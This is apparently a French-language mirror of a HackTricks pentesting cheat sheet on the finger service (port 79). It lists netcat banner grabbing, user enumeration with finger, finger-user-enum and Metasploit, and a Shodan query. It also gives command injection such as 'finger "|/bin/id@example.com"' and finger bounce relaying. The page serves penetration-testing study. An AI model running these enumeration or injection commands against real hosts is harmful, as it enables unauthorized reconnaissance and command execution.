mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 08:30:57 +00:00
4 KiB
4 KiB
79 - Pentesting Finger
Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres moyens de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le merchandising officiel PEASS & HackTricks
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.
Informations de base
Finger est un programme que vous pouvez utiliser pour trouver des informations sur les utilisateurs d'ordinateurs. Il liste généralement le nom de connexion, le nom complet, et éventuellement d'autres détails sur l'utilisateur que vous interrogez. Ces détails peuvent inclure l'emplacement du bureau et le numéro de téléphone (si connus), l'heure de connexion, le temps d'inactivité, l'heure à laquelle le courrier a été lu pour la dernière fois, et les fichiers de plan et de projet de l'utilisateur.
Port par défaut : 79
PORT STATE SERVICE
79/tcp open finger
Énumération
Récupération de bannière/Connexion de base
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Énumération des utilisateurs
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Vous pouvez également utiliser finger-user-enum de pentestmonkey, voici quelques exemples :
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap exécute un script en utilisant les scripts par défaut
Metasploit utilise plus d'astuces que Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Exécution de commande
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Rebond Finger
Utiliser un système comme relais finger
finger user@host@victim
finger @internal@external
Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres moyens de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le merchandising officiel PEASS & HackTricks
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.